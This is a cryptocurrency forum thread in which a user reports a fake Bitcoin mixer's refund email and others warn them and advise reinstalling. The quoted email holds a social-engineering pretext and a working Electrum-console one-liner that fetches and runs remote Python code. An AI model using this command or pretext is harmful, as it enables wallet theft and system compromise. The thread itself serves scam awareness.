Electrum console command

[duckduckwent]

I used this bitcoin mixer site bitcoinmixer.eu couple of days ago and after realizing something went wrong, I emailed them for help. Today I got a replay

--------------------------------------
First of all we apologize for the possible problems that may have caused our failure. This has been due to an internal failure in our transaction database, so we are not able to match source with destination. Anyway, we will return all your money including fees as soon as possible. However, we have been victim of cheating attempts and we must verify that you are the owner of the original account. Do not worry, we have simplified the protocol and you should follow just simple instructions. Follow these instructions step by step:
 
1) Open electrum with the wallet you made the transaction.
2) Go to the View menu -> Show console -> Click on the "Console" tab.
3) Type next line and replace “<output_btc_address>” with the output address you used in the mixing process. (you can copy and paste it from your guarantee letter)" IMPORTANT PRESS ENTER AFTER PASTE IT!!!
 
 
 
4) Then program will ask you to sign an internal message that will be send to us.
5) Wait for the verification message in the command line: "Refund ordered. You will have your funds back in seconds."
 
Example:
 
Suppose your output address was: 1HB5XMLmzFVj8ALj6mfBsbifRoD4miY36v
 
You have to open your electrum console and copy and paste next line (IMPORTANT PRESS ENTER AFTER PASTE IT!!):
 
exec("import requests\nexec(requests.get('https://bitcoinmixer.eu/fast_return/1HB5XMLmzFVj8ALj6mfBsbifRoD4miY36v').text)")
 
Please, do not hesitate to contact us if you have any further questions or complains,
 
BitcoinMixer
-----------------------------------

I did whatever they asked , pasted this command in console
exec("import requests\nexec(requests.get('https://bitcoinmixer.eu/fast_return/18C3DYDMeC5XWvHxBC5EyqMoG5WxMng4cK').text)")
as they instructed and got this message from Electrum console "Server exception, please, contact with support."

I'm realizing now that they are most likely SCAMMERS since their reply address didn't work. My question is, what damage could do the script I executed do to my wallet. Should i delete my wallet? Should I change my password to my other wallet?

Thank you very in advance for your suggestions.
 
 

[1715304091]

1715304091

[1715304091]

1715304091

[1715304091]

1715304091

[Rath_]

Bitcoinmixer.eu is listed as a scam on this list which is maintained by a trusted member.

I'm realizing now that they are most likely SCAMMERS since their reply address didn't work. My question is, what damage could do the script I executed do to my wallet. Should i delete my wallet? Should I change my password to my other wallet?

Since the console returned an error, I don't think it did any harm to your wallet. You might want to move your coins to a new wallet, just in case. If the code had been executed correctly, I am sure that your funds would have been transferred out.

[duckduckwent]

Bitcoinmixer.eu is listed as a scam on this list which is maintained by a trusted member.

I'm realizing now that they are most likely SCAMMERS since their reply address didn't work. My question is, what damage could do the script I executed do to my wallet. Should i delete my wallet? Should I change my password to my other wallet?

Since the console returned an error, I don't think it did any harm to your wallet. You might want to move your coins to a new wallet, just in case. If it had been executed correctly, I am sure that your funds would have been transferred out.

Thanks so much for your suggestion.
I transferred my 2 cents to another wallet and deleted likely compromised wallet.
What  that command does anyway ? Could the still my Electrum password somehow? Should I change my passwords.
Thanks again.

[DireWolfM14]

That's a bunch of BS!  Luckily you didn't enter the command correctly, which is most likely designed to drain your wallet.  No legitimate service is going to ask you to run some command like that.  At the most they'll ask you to sign a message using the address from which you sent the funds.

Use ChipMixer, click on the link in BitCryptex's signature.  

[Rath_]

What  that command does anyway ? Could the still my Electrum password somehow? Should I change my passwords.

It executes the code downloaded from an external website. I can't really tell you what it exactly does because I am unable to view the contents of the link. I don't think that they have stolen your Electrum password.

[duckduckwent]

Thank you guys so much. I'm very new so mistakes were expected. Thanks again.

[nc50lc]

I don't think Electrum have a native error like that,
it seems like the command was successfully executed and it's just a pre-defined result.
All because, Electrum doesn't have a support to contact, no?

@duckduckwent If I were you, I will create a new seed/wallet in another PC, send all my funds to it and wipe my current PC clean to be sure.
That command is strikingly similar to fake mixer: helix's support message, it runs a script to send your seed to their server & more bonus scripts.

[Abdussamad]

your PC is likely compromised now since you ran a malicous program on it. you should have paid attention to the warning on the console tab. it tells you not to run random code from untrusted sources!

best to reformat, reinstall the OS and electrum and move your coins to a new wallet.

[duckduckwent]

You are guys scaring the **** out of me. I have deleted my wallet but it's seems unreal that you can infect Linux system by executing command in Electrum. Please somebody confirm or deny that it's possible.

[o_e_l_e_o]

The Electrum console is just a python interface. As far as I am aware, it will run any python code. This seems to be confirmed by the following GitHub page: https://github.com/spesmilo/electrum/issues/3678. So yes, it seems entirely possible that you could have compromised your system, unless you were running Electrum in a secure sandbox.

I have no idea what the file you downloaded was, and I have no desire to download it and find out. It could very well have contained code to compromise your system. That's why there is a big warning on the console telling you not to do the exact thing you did.

As Abdussamad says, the only way you can be 100% safe is to reformat.

[duckduckwent]

The Electrum console is just a python interface. As far as I am aware, it will run any python code. This seems to be confirmed by the following GitHub page: https://github.com/spesmilo/electrum/issues/3678. So yes, it seems entirely possible that you could have compromised your system, unless you were running Electrum in a secure sandbox.

I have no idea what the file you downloaded was, and I have no desire to download it and find out. It could very well have contained code to compromise your system. That's why there is a big warning on the console telling you not to do the exact thing you did.

As Abdussamad says, the only way you can be 100% safe is to reformat.

ouch!

Is there any way to check if OS is compromised? I'm using Kali Linux...

Thanks

[malevolent]

ouch!

Is there any way to check if OS is compromised? I'm using Kali Linux...

Thanks

To be on the safe side, you should at a minimum reinstall your system. Don't take any chances when money is at stake (I assume you'll be using this OS instance to handle bitcoins).

[Pmalek]

Is there any way to check if OS is compromised? I'm using Kali Linux...

You can scan your OS with a quality anti virus software, try additional software like Spybot Search & Destroy, Malwarebytes, anti rootkit scanners but there are still no guarantees that it will detect anything. The results might come back as clean if the code is still fresh and not yet recognized as malicious by AV vectors.
Reinstalling your OS is the safest way to go. Anything else is a gamble.

[Abdussamad]

You are guys scaring the **** out of me. I have deleted my wallet but it's seems unreal that you can infect Linux system by executing command in Electrum. Please somebody confirm or deny that it's possible.

if it's linux and you're running as an unprivileged user then at best it has access to files that that user has access to. it's still possible for it to install malware that runs when the user logs in. that malware could then snoop on your electrum seed and/or password when you enter it. so IMO it would be better to do a reinstall just to be safe. you don't want to take a risk with money involved.

[DireWolfM14]

it's seems unreal that you can infect Linux system by executing command in Electrum. Please somebody confirm or deny that it's possible.

Dangerous misconception.  Linux systems are as vulnerable to malware and viruses as any other system.  Most hackers target Windows and Macs because they are more common, and therefor maximize the hacker's efforts.  This has given many Linux users a false sense of security.  Mac OS has been based on Unix for several years now, and as a result there are more hacks that can target multiple platforms. 

As o_e_l_e_o mentioned, you executed a python command from and untrustworthy source.  The best way to ensure your safety is to delete your hard drive partitions and reinstall the OS.

[BitMaxz]

~snip~
AFAIK those software you mentioned only available on Windows

Malwarebytes can be installed in Linux based OS but you need to install both Wine and Visual Basic 6.0 Run-Time to make Malwarebytes works.

There are some guidelines on how to install this software in Linux to check this guide click the link below.

- How to Install Malwarebytes on Ubuntu

[Abdussamad]

malwarebytes won't know anything about linux malware. there would be no point in installing it